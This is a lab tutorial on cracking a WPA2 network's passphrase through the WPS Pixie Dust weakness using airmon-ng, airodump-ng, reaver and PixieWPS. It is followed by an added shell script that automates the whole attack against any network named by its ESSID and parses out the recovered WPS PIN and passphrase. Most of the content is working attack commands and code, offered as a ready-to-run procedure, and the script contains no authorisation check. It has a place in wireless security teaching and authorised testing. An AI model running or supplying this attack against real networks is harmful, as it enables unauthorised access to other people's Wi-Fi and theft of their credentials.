Lab: Crack a WPA2 PSK network with Reaver & PixieWPS
Scenario
Attacker – Kali Linux (Sana) machine (not a VM)
Target – Belkin AP
Step 1 : Initial Setup
Put the wireless card into monitor mode so it can capture frames from the air. First stop the network manager and check for processes that would interfere with the card.
Command: service network-manager stop
Command: airmon-ng check
Kill the interfering processes it lists. Repeat this for every listed process until airmon-ng check reports that nothing is interfering.
Command: kill -9 <pid>
Command: airmon-ng check
Confirm the name of your wireless interface, then start the monitor interface on it (airmon-ng names it wlan0mon when the interface is wlan0).
Command: iwconfig
Command: airmon-ng start wlan0 <replace with yours>
Reaver Initial Setup
Step 2 : Start Capture & select target.
airodump-ng displays the access points and clients seen on the monitor interface. The captured packets can optionally be written to a file. A full tutorial on airodump-ng will follow.
Command: airodump-ng wlan0mon <replace with yours>
Starting Capture
airodump-ng takes over the terminal with a continuously updating list of networks. Note the target's BSSID, channel and ESSID, then press Ctrl+C to stop it. Run reaver against the target:
Command: reaver -i wlan0mon <replace with yours> -b <bssid> -c <channel no> -K 1 -vv
Here -i is the monitor interface, -b the target BSSID, -c the target channel, -K 1 tells reaver to run the PixieWPS (pixie dust) attack on the values exchanged in the WPS handshake, and -vv gives verbose output.
Capture & Reaver Output
The figure above shows the MAC address (BSSID) of the target; it is the value given to reaver's -b option.
Pixie Output
There you have the passphrase and the PIN. This is a combined offline and online attack: reaver runs the WPS exchange with the AP over the air (online), PixieWPS recovers the WPS PIN offline from the nonces and hashes the AP sent during that exchange, and reaver then uses the recovered PIN to obtain the WPA2 passphrase. It can be run against wireless access points during wireless penetration tests. PixieWPS only succeeds against APs whose WPS implementation derives its nonces from a weak or predictable random number generator; against other APs reaver continues with the much slower online PIN brute force, which many APs rate-limit. The verbose output also reveals a lot of other information about the AP, such as its manufacturer and model number, which can be used during a test to search for publicly known vulnerabilities of that specific device.
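The two steps above, written out as one script. This is an added example and not part of the original lab: it chains the commands from Step 1 and Step 2 and adds two small parsers, one that picks the target BSSID and channel out of an airodump-ng CSV dump by ESSID and one that pulls the PIN and passphrase out of reaver's log, so the result does not have to be read off the screen. Everything not stated on the page is an assumption: the airodump-ng CSV column layout, reaver's final "WPS PIN:" / "WPA PSK:" lines, the <iface>mon naming used by airmon-ng on Kali 2.x, and the sample CSV and log, which are constructed, not captured.

```shell
#!/bin/sh
# Added example, not from the original lab: the Step 1 / Step 2 procedure as one
# script plus parsers for the tool output. Assumptions (not stated on the page):
# airodump-ng CSV layout (BSSID in column 1, channel in 4, ESSID in 14), reaver's
# "WPS PIN: '...'" / "WPA PSK: '...'" result lines, and that airmon-ng names the
# monitor interface <iface>mon as it does on Kali 2.x.

# select_target CSV ESSID -> prints "BSSID channel" for the AP with that ESSID,
# exit 1 if it is not in the dump. Only the AP section (before "Station MAC") is read.
select_target() {
    awk -F', *' -v want="$2" '
        /^Station MAC/ { exit }                  # client section starts here
        NF >= 14 && $14 == want { print $1, $4; found = 1; exit }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# extract_result < reaver.log -> prints "PIN PSK", exit 1 if reaver did not finish.
# Fields are split on the single quotes reaver puts around both values.
extract_result() {
    awk -F"'" '
        /WPS PIN:/ { pin = $2 }
        /WPA PSK:/ { psk = $2 }
        END { if (pin == "" || psk == "") exit 1; print pin, psk }
    '
}

# run_attack IFACE ESSID -> the lab procedure start to finish. Needs root and the
# tools named on the page; guarded below so testing this file never touches the radio.
run_attack() {
    iface=$1 essid=$2 dump=/tmp/wps-lab
    service network-manager stop
    airmon-ng check kill                         # same effect as the manual kill -9 loop
    airmon-ng start "$iface"
    mon="${iface}mon"                            # assumption: Kali 2.x naming (wlan0 -> wlan0mon)
    # capture for 30 s into <dump>-01.csv instead of watching the live screen
    timeout 30 airodump-ng --write "$dump" --output-format csv "$mon" >/dev/null 2>&1
    target=$(select_target "${dump}-01.csv" "$essid") || { echo "$essid not seen" >&2; return 1; }
    bssid=${target% *} chan=${target#* }
    reaver -i "$mon" -b "$bssid" -c "$chan" -K 1 -vv 2>&1 | tee "${dump}-reaver.log"
    extract_result < "${dump}-reaver.log"
}

# Constructed sample data (not real captures) so the parsers can be exercised offline.
SAMPLE_CSV=$(mktemp)
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
08:86:3B:00:11:22, 2015-06-01 10:00:00, 2015-06-01 10:00:30,  6, 54, WPA2, CCMP, PSK, -47, 31, 0,   0.  0.  0.  0, 10, belkin.cc3, 
00:11:22:33:44:55, 2015-06-01 10:00:01, 2015-06-01 10:00:30, 11, 54, WPA2, CCMP, PSK, -70, 12, 0,   0.  0.  0.  0,  7, HomeNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
EOF

SAMPLE_REAVER_LOG="[+] Waiting for beacon from 08:86:3B:00:11:22
[+] Associated with 08:86:3B:00:11:22 (ESSID: belkin.cc3)
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] WPS PIN: '12345670'
[+] WPA PSK: 'correct horse battery'
[+] AP SSID: 'belkin.cc3'"

demo_select()  { select_target "$SAMPLE_CSV" belkin.cc3; }
demo_extract() { printf '%s\n' "$SAMPLE_REAVER_LOG" | extract_result; }

# Real run only when asked for explicitly:  WPS_LAB_RUN=1 ESSID=belkin.cc3 sh wps-lab.sh
if [ "${WPS_LAB_RUN:-0}" = 1 ]; then
    run_attack "${IFACE:-wlan0}" "${ESSID:?set ESSID to the target network name}"
fi
```

The parsers are deliberately minimal: select_target stops at the "Station MAC" header so a client probing for the same ESSID can never be mistaken for the AP, and extract_result exits non-zero when reaver stops before printing both values, which is what you see when the AP's nonces are not predictable and the pixie dust step fails. A passphrase containing a single quote would confuse the quote-based split; check the log by hand in that case.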
For best performance of the attack use an Alfa Network AWUS036NH or a similar adapter.
Related Video: https://vimeo.com/126489367